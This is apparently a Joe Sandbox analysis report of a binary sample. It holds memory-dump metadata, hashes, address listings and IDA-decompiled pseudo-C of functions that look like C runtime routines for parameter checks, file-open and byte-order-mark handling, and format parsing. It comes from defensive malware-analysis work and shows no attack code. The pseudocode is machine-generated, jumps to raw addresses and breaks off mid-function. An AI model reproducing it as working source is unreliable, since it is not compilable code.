                                                                                                                                                                                                                                                        0x7ff6e5ac20ea
                                                                                                                                                                                                                                                        0x7ff6e5ac20ed
                                                                                                                                                                                                                                                        0x7ff6e5ac20f1
                                                                                                                                                                                                                                                        0x7ff6e5ac20f7
                                                                                                                                                                                                                                                        0x7ff6e5ac20fb
                                                                                                                                                                                                                                                        0x7ff6e5ac2102
                                                                                                                                                                                                                                                        0x7ff6e5ac2108
                                                                                                                                                                                                                                                        0x7ff6e5ac2117
                                                                                                                                                                                                                                                        0x7ff6e5ac211d
                                                                                                                                                                                                                                                        0x7ff6e5ac211f
                                                                                                                                                                                                                                                        0x7ff6e5ac2122
                                                                                                                                                                                                                                                        0x7ff6e5ac2124
                                                                                                                                                                                                                                                        0x7ff6e5ac2127
                                                                                                                                                                                                                                                        0x7ff6e5ac2129
                                                                                                                                                                                                                                                        0x7ff6e5ac212c
                                                                                                                                                                                                                                                        0x7ff6e5ac213a
                                                                                                                                                                                                                                                        0x7ff6e5ac2144
                                                                                                                                                                                                                                                        0x7ff6e5ac2147
                                                                                                                                                                                                                                                        0x7ff6e5ac214b
                                                                                                                                                                                                                                                        0x7ff6e5ac2152
                                                                                                                                                                                                                                                        0x7ff6e5ac2156
                                                                                                                                                                                                                                                        0x7ff6e5ac215d
                                                                                                                                                                                                                                                        0x7ff6e5ac2163
                                                                                                                                                                                                                                                        0x7ff6e5ac2170
                                                                                                                                                                                                                                                        0x7ff6e5ac2193

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3511ad376341763adbf03eaa1481790c1cd7a3e825f7d6c297581565e8b6740f
                                                                                                                                                                                                                                                        • Instruction ID: 7d3c05a8b1264acc46cbbb842e8a49daeddce47964f00ae2a186ddf6aa660fab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3511ad376341763adbf03eaa1481790c1cd7a3e825f7d6c297581565e8b6740f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FB12A77B0868585EB658F2DC46026C3BA5EF85F48F244136CB8ECB395CF2AD841C75A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACD718(void* __rax, long long __rbx, unsigned int* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, intOrPtr _a40, intOrPtr _a48, void* _a64, long long _a80) {
                                                                                                                                                                                                                                                        				long long _v48;
                                                                                                                                                                                                                                                        				signed long long _v56;
                                                                                                                                                                                                                                                        				long long _t37;
                                                                                                                                                                                                                                                        				long long _t44;
                                                                                                                                                                                                                                                        				unsigned int* _t49;
                                                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_t58 = __r8;
                                                                                                                                                                                                                                                        				_t49 = __rcx;
                                                                                                                                                                                                                                                        				if (__rdx != 0) goto 0xe5acd768;
                                                                                                                                                                                                                                                        				_t44 = _a80;
                                                                                                                                                                                                                                                        				_v48 = _t44;
                                                                                                                                                                                                                                                        				 *((char*)(_t44 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t44 + 0x2c)) = __rdx + 0x16;
                                                                                                                                                                                                                                                        				_v56 = _v56 & 0x00000000;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(__rax, __rbx, _t44, __rdx, __rsi, _t51, __r8);
                                                                                                                                                                                                                                                        				goto 0xe5acd9d7;
                                                                                                                                                                                                                                                        				if (_t58 != 0) goto 0xe5acd788;
                                                                                                                                                                                                                                                        				_t37 = _a80;
                                                                                                                                                                                                                                                        				_v48 = _t37;
                                                                                                                                                                                                                                                        				 *((char*)(_t37 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t37 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				goto 0xe5acd74c;
                                                                                                                                                                                                                                                        				if (__r9 == 0) goto 0xe5acd76d;
                                                                                                                                                                                                                                                        				if (_a40 == 0) goto 0xe5acd76d;
                                                                                                                                                                                                                                                        				if (_a48 == 0x41) goto 0xe5acd7b3;
                                                                                                                                                                                                                                                        				if (_t44 - 0x45 - 2 <= 0) goto 0xe5acd7b3;
                                                                                                                                                                                                                                                        				sil = 0;
                                                                                                                                                                                                                                                        				goto 0xe5acd7b6;
                                                                                                                                                                                                                                                        				sil = 1;
                                                                                                                                                                                                                                                        				if (0 != 0) goto 0xe5acd8ad;
                                                                                                                                                                                                                                                        				if ( *_t49 >> 0x34 != 0x7ff) goto 0xe5acd8ad;
                                                                                                                                                                                                                                                        				r8d = 0xc;
                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                        0x7ff6e5acd718
                                                                                                                                                                                                                                                        0x7ff6e5acd71d
                                                                                                                                                                                                                                                        0x7ff6e5acd727
                                                                                                                                                                                                                                                        0x7ff6e5acd72d
                                                                                                                                                                                                                                                        0x7ff6e5acd733
                                                                                                                                                                                                                                                        0x7ff6e5acd735
                                                                                                                                                                                                                                                        0x7ff6e5acd740
                                                                                                                                                                                                                                                        0x7ff6e5acd745
                                                                                                                                                                                                                                                        0x7ff6e5acd749
                                                                                                                                                                                                                                                        0x7ff6e5acd74c
                                                                                                                                                                                                                                                        0x7ff6e5acd752
                                                                                                                                                                                                                                                        0x7ff6e5acd755
                                                                                                                                                                                                                                                        0x7ff6e5acd75c
                                                                                                                                                                                                                                                        0x7ff6e5acd763
                                                                                                                                                                                                                                                        0x7ff6e5acd76b
                                                                                                                                                                                                                                                        0x7ff6e5acd76d
                                                                                                                                                                                                                                                        0x7ff6e5acd77a
                                                                                                                                                                                                                                                        0x7ff6e5acd77f
                                                                                                                                                                                                                                                        0x7ff6e5acd783
                                                                                                                                                                                                                                                        0x7ff6e5acd786
                                                                                                                                                                                                                                                        0x7ff6e5acd78b
                                                                                                                                                                                                                                                        0x7ff6e5acd798
                                                                                                                                                                                                                                                        0x7ff6e5acd7a4
                                                                                                                                                                                                                                                        0x7ff6e5acd7ac
                                                                                                                                                                                                                                                        0x7ff6e5acd7ae
                                                                                                                                                                                                                                                        0x7ff6e5acd7b1
                                                                                                                                                                                                                                                        0x7ff6e5acd7b3
                                                                                                                                                                                                                                                        0x7ff6e5acd7c1
                                                                                                                                                                                                                                                        0x7ff6e5acd7dc
                                                                                                                                                                                                                                                        0x7ff6e5acd7ef

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b482d32cf4439f597672c93949c919f143e2d798b80af63496daf47fa9f459cc
                                                                                                                                                                                                                                                        • Instruction ID: 2310783fef7d7c9067db8589bb3412a4170767ec8bd4faf7cf2f8d652df2e31a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b482d32cf4439f597672c93949c919f143e2d798b80af63496daf47fa9f459cc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA81B173B087C185EB74CB1D94603696A90FF45B94F144239DA9EDBB89DF3EE8408B05
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD5820(signed int __ecx, long long __rbx, signed char* __rdx, long long __rsi, intOrPtr* __r9) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                                                                        				void* _t112;
                                                                                                                                                                                                                                                        				intOrPtr* _t130;
                                                                                                                                                                                                                                                        				signed int* _t135;
                                                                                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                                                                                        				long long _t145;
                                                                                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                                                                        				intOrPtr* _t156;
                                                                                                                                                                                                                                                        				void* _t158;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t132 = __rbx;
                                                                                                                                                                                                                                                        				_t154 = _t148;
                                                                                                                                                                                                                                                        				 *((long long*)(_t154 + 0x10)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t154 + 0x18)) = _t145;
                                                                                                                                                                                                                                                        				 *((long long*)(_t154 + 0x20)) = __rsi;
                                                                                                                                                                                                                                                        				_push(_t141);
                                                                                                                                                                                                                                                        				_t149 = _t148 - 0x30;
                                                                                                                                                                                                                                                        				 *((char*)(__r9)) = 0;
                                                                                                                                                                                                                                                        				r10d = r10d & 0x0000003f;
                                                                                                                                                                                                                                                        				_t156 = __r9;
                                                                                                                                                                                                                                                        				_t96 = r8d;
                                                                                                                                                                                                                                                        				_t130 =  *((intOrPtr*)(0xe5afca30 + (__ecx >> 6) * 8));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t130 + 0x38 + (__ecx + __ecx * 8) * 8)) >= 0) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				if ((0x00074000 & r8d) != 0) goto 0xe5ad589c;
                                                                                                                                                                                                                                                        				_t135 = _t154 + 8;
                                                                                                                                                                                                                                                        				 *(_t149 + 0x50) = 0;
                                                                                                                                                                                                                                                        				_t101 = E00007FF67FF6E5AC576C(_t130, _t135);
                                                                                                                                                                                                                                                        				if (_t101 != 0) goto 0xe5ad5a8b;
                                                                                                                                                                                                                                                        				if (_t101 != 0) goto 0xe5ad58d6;
                                                                                                                                                                                                                                                        				asm("bts esi, 0xe");
                                                                                                                                                                                                                                                        				if ((_t96 & 0x00074000) == 0x4000) goto 0xe5ad58ec;
                                                                                                                                                                                                                                                        				if ((0xffffbfff & _t135 - 0x00010000) == 0) goto 0xe5ad58da;
                                                                                                                                                                                                                                                        				if ((0xffffbfff & _t135 - 0x00020000) == 0) goto 0xe5ad58e7;
                                                                                                                                                                                                                                                        				_t49 = _t135 - 0x40000;
                                                                                                                                                                                                                                                        				if ((0xffffbfff & _t49) != 0) goto 0xe5ad58ef;
                                                                                                                                                                                                                                                        				 *((char*)(__r9)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ad58ef;
                                                                                                                                                                                                                                                        				_t97 = _t96 | _t49;
                                                                                                                                                                                                                                                        				goto 0xe5ad589c;
                                                                                                                                                                                                                                                        				if ((_t97 & 0x00000301) != 0x301) goto 0xe5ad58ef;
                                                                                                                                                                                                                                                        				 *__r9 = dil;
                                                                                                                                                                                                                                                        				goto 0xe5ad58ef;
                                                                                                                                                                                                                                                        				 *((char*)(__r9)) = 0;
                                                                                                                                                                                                                                                        				if ((_t97 & 0x00070000) == 0) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				if (( *__rdx & 0x00000040) != 0) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				_t53 = __rdx[4] & 0xc0000000;
                                                                                                                                                                                                                                                        				if (_t53 == 0x40000000) goto 0xe5ad592b;
                                                                                                                                                                                                                                                        				if (_t53 == 0x80000000) goto 0xe5ad59a9;
                                                                                                                                                                                                                                                        				_t111 = _t53 - 0xc0000000;
                                                                                                                                                                                                                                                        				if (_t111 != 0) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				if (_t111 == 0) goto 0xe5ad594b;
                                                                                                                                                                                                                                                        				if (_t111 == 0) goto 0xe5ad594b;
                                                                                                                                                                                                                                                        				if (_t111 == 0) goto 0xe5ad596f;
                                                                                                                                                                                                                                                        				if (_t111 == 0) goto 0xe5ad596f;
                                                                                                                                                                                                                                                        				_t112 = __rdx[8] - 0xfffffffffffffffe - 1;
                                                                                                                                                                                                                                                        				if (_t112 != 0) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				 *(_t149 + 0x50) = 0;
                                                                                                                                                                                                                                                        				if (_t112 == 0) goto 0xe5ad5a3a;
                                                                                                                                                                                                                                                        				if ( *((char*)(__r9)) - 1 != 1) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				goto 0xe5ad5a44;
                                                                                                                                                                                                                                                        				r8d = 2;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACB754(_t130, __rbx, _t141, _t158, _t155);
                                                                                                                                                                                                                                                        				if (_t130 == 0) goto 0xe5ad594b;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACB754(_t130, _t132, _t141);
                                                                                                                                                                                                                                                        				if (_t130 != 0xffffffff) goto 0xe5ad59a0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t130);
                                                                                                                                                                                                                                                        				goto 0xe5ad5a72;
                                                                                                                                                                                                                                                        				if ((__rdx[4] & 0x80000000) == 0) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				r8d = 3;
                                                                                                                                                                                                                                                        				 *(_t149 + 0x50) = 0;
                                                                                                                                                                                                                                                        				_t59 = E00007FF67FF6E5ACAF2C(0, r15d, _t130, _t132, _t149 + 0x50);
                                                                                                                                                                                                                                                        				if (_t59 == 0xffffffff) goto 0xe5ad5994;
                                                                                                                                                                                                                                                        				if (_t59 == 2) goto 0xe5ad59e2;
                                                                                                                                                                                                                                                        				if (_t59 != 3) goto 0xe5ad5a22;
                                                                                                                                                                                                                                                        				if ( *(_t149 + 0x50) != 0xbfbbef) goto 0xe5ad59e2;
                                                                                                                                                                                                                                                        				 *_t156 = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				_t85 =  *(_t149 + 0x50) & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t85 != 0xfffe) goto 0xe5ad59fc;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t130);
                                                                                                                                                                                                                                                        				 *_t130 = 0x16;
                                                                                                                                                                                                                                                        				goto 0xe5ad5994;
                                                                                                                                                                                                                                                        				if (_t85 != 0xfeff) goto 0xe5ad5a22;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACB754(_t130, _t132, _t141);
                                                                                                                                                                                                                                                        				if (_t130 == 0xffffffff) goto 0xe5ad5994;
                                                                                                                                                                                                                                                        				 *_t156 = dil;
                                                                                                                                                                                                                                                        				goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACB754(_t130, _t132, _t141);
                                                                                                                                                                                                                                                        				if (_t130 != 0xffffffff) goto 0xe5ad5a70;
                                                                                                                                                                                                                                                        				goto 0xe5ad5994;
                                                                                                                                                                                                                                                        				 *(_t149 + 0x50) = 0xbfbbef;
                                                                                                                                                                                                                                                        				r8d = 3;
                                                                                                                                                                                                                                                        				r8d = r8d;
                                                                                                                                                                                                                                                        				_t66 = E00007FF67FF6E5ACC278(0, _t132, _t141);
                                                                                                                                                                                                                                                        				if (_t66 == 0xffffffff) goto 0xe5ad5994;
                                                                                                                                                                                                                                                        				if (3 - 0 + _t66 > 0) goto 0xe5ad5a48;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                        0x7ff6e5ad5820
                                                                                                                                                                                                                                                        0x7ff6e5ad5820
                                                                                                                                                                                                                                                        0x7ff6e5ad5823
                                                                                                                                                                                                                                                        0x7ff6e5ad5827
                                                                                                                                                                                                                                                        0x7ff6e5ad582b
                                                                                                                                                                                                                                                        0x7ff6e5ad582f
                                                                                                                                                                                                                                                        0x7ff6e5ad5834
                                                                                                                                                                                                                                                        0x7ff6e5ad5840
                                                                                                                                                                                                                                                        0x7ff6e5ad5843
                                                                                                                                                                                                                                                        0x7ff6e5ad5851
                                                                                                                                                                                                                                                        0x7ff6e5ad5858
                                                                                                                                                                                                                                                        0x7ff6e5ad5862
                                                                                                                                                                                                                                                        0x7ff6e5ad586b
                                                                                                                                                                                                                                                        0x7ff6e5ad5879
                                                                                                                                                                                                                                                        0x7ff6e5ad587b
                                                                                                                                                                                                                                                        0x7ff6e5ad587f
                                                                                                                                                                                                                                                        0x7ff6e5ad5888
                                                                                                                                                                                                                                                        0x7ff6e5ad588a
                                                                                                                                                                                                                                                        0x7ff6e5ad5896
                                                                                                                                                                                                                                                        0x7ff6e5ad5898
                                                                                                                                                                                                                                                        0x7ff6e5ad58ab
                                                                                                                                                                                                                                                        0x7ff6e5ad58ba
                                                                                                                                                                                                                                                        0x7ff6e5ad58c4
                                                                                                                                                                                                                                                        0x7ff6e5ad58c6
                                                                                                                                                                                                                                                        0x7ff6e5ad58ce
                                                                                                                                                                                                                                                        0x7ff6e5ad58d0
                                                                                                                                                                                                                                                        0x7ff6e5ad58d4
                                                                                                                                                                                                                                                        0x7ff6e5ad58d6
                                                                                                                                                                                                                                                        0x7ff6e5ad58d8
                                                                                                                                                                                                                                                        0x7ff6e5ad58e5
                                                                                                                                                                                                                                                        0x7ff6e5ad58e7
                                                                                                                                                                                                                                                        0x7ff6e5ad58ea
                                                                                                                                                                                                                                                        0x7ff6e5ad58ec
                                                                                                                                                                                                                                                        0x7ff6e5ad58f5
                                                                                                                                                                                                                                                        0x7ff6e5ad58ff
                                                                                                                                                                                                                                                        0x7ff6e5ad590d
                                                                                                                                                                                                                                                        0x7ff6e5ad5919
                                                                                                                                                                                                                                                        0x7ff6e5ad591d
                                                                                                                                                                                                                                                        0x7ff6e5ad5923
                                                                                                                                                                                                                                                        0x7ff6e5ad5925
                                                                                                                                                                                                                                                        0x7ff6e5ad5931
                                                                                                                                                                                                                                                        0x7ff6e5ad5936
                                                                                                                                                                                                                                                        0x7ff6e5ad593b
                                                                                                                                                                                                                                                        0x7ff6e5ad5940
                                                                                                                                                                                                                                                        0x7ff6e5ad5942
                                                                                                                                                                                                                                                        0x7ff6e5ad5945
                                                                                                                                                                                                                                                        0x7ff6e5ad594f
                                                                                                                                                                                                                                                        0x7ff6e5ad5956
                                                                                                                                                                                                                                                        0x7ff6e5ad595f
                                                                                                                                                                                                                                                        0x7ff6e5ad596a
                                                                                                                                                                                                                                                        0x7ff6e5ad596f
                                                                                                                                                                                                                                                        0x7ff6e5ad5977
                                                                                                                                                                                                                                                        0x7ff6e5ad597f
                                                                                                                                                                                                                                                        0x7ff6e5ad5981
                                                                                                                                                                                                                                                        0x7ff6e5ad5989
                                                                                                                                                                                                                                                        0x7ff6e5ad5992
                                                                                                                                                                                                                                                        0x7ff6e5ad5994
                                                                                                                                                                                                                                                        0x7ff6e5ad599b
                                                                                                                                                                                                                                                        0x7ff6e5ad59a3
                                                                                                                                                                                                                                                        0x7ff6e5ad59a9
                                                                                                                                                                                                                                                        0x7ff6e5ad59af
                                                                                                                                                                                                                                                        0x7ff6e5ad59bb
                                                                                                                                                                                                                                                        0x7ff6e5ad59c3
                                                                                                                                                                                                                                                        0x7ff6e5ad59c7
                                                                                                                                                                                                                                                        0x7ff6e5ad59cc
                                                                                                                                                                                                                                                        0x7ff6e5ad59d7
                                                                                                                                                                                                                                                        0x7ff6e5ad59d9
                                                                                                                                                                                                                                                        0x7ff6e5ad59dd
                                                                                                                                                                                                                                                        0x7ff6e5ad59e2
                                                                                                                                                                                                                                                        0x7ff6e5ad59ed
                                                                                                                                                                                                                                                        0x7ff6e5ad59ef
                                                                                                                                                                                                                                                        0x7ff6e5ad59f4
                                                                                                                                                                                                                                                        0x7ff6e5ad59fa
                                                                                                                                                                                                                                                        0x7ff6e5ad5a03
                                                                                                                                                                                                                                                        0x7ff6e5ad5a05
                                                                                                                                                                                                                                                        0x7ff6e5ad5a0e
                                                                                                                                                                                                                                                        0x7ff6e5ad5a17
                                                                                                                                                                                                                                                        0x7ff6e5ad5a1d
                                                                                                                                                                                                                                                        0x7ff6e5ad5a20
                                                                                                                                                                                                                                                        0x7ff6e5ad5a22
                                                                                                                                                                                                                                                        0x7ff6e5ad5a2a
                                                                                                                                                                                                                                                        0x7ff6e5ad5a33
                                                                                                                                                                                                                                                        0x7ff6e5ad5a35
                                                                                                                                                                                                                                                        0x7ff6e5ad5a44
                                                                                                                                                                                                                                                        0x7ff6e5ad5a48
                                                                                                                                                                                                                                                        0x7ff6e5ad5a53
                                                                                                                                                                                                                                                        0x7ff6e5ad5a5c
                                                                                                                                                                                                                                                        0x7ff6e5ad5a64
                                                                                                                                                                                                                                                        0x7ff6e5ad5a6e
                                                                                                                                                                                                                                                        0x7ff6e5ad5a8a

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                                                                                                                                                                                                                        • Instruction ID: ada0d48194561942a5255b652f8cf39f8efe6c77da48758a09f2a447fc6beb34
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE61C423F0816246FB24B92D946437966D1AF48B78F540239DE1EC66D5DE7FEC008F0A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC0FB4(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				signed long long _v24;
                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                                                        				intOrPtr* _t126;
                                                                                                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                                                                                                        				char* _t128;
                                                                                                                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                                                                                                                        				void* _t133;
                                                                                                                                                                                                                                                        				intOrPtr _t144;
                                                                                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t114 = _t148;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_push(_t154);
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                                                                                                                                                                                                                        				bpl = __edx;
                                                                                                                                                                                                                                                        				_t123 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 8;
                                                                                                                                                                                                                                                        				_t98 = r8d - 5;
                                                                                                                                                                                                                                                        				if (_t98 > 0) goto 0xe5ac10b0;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac1016;
                                                                                                                                                                                                                                                        				_t99 = r8d;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac1107;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac1087;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac105f;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac1107;
                                                                                                                                                                                                                                                        				if (r8d != 1) goto 0xe5ac10d3;
                                                                                                                                                                                                                                                        				_t83 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_t126 =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
                                                                                                                                                                                                                                                        				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac1049;
                                                                                                                                                                                                                                                        				if ( *_t126 >= 0) goto 0xe5ac1049;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t83 | 0x00000040;
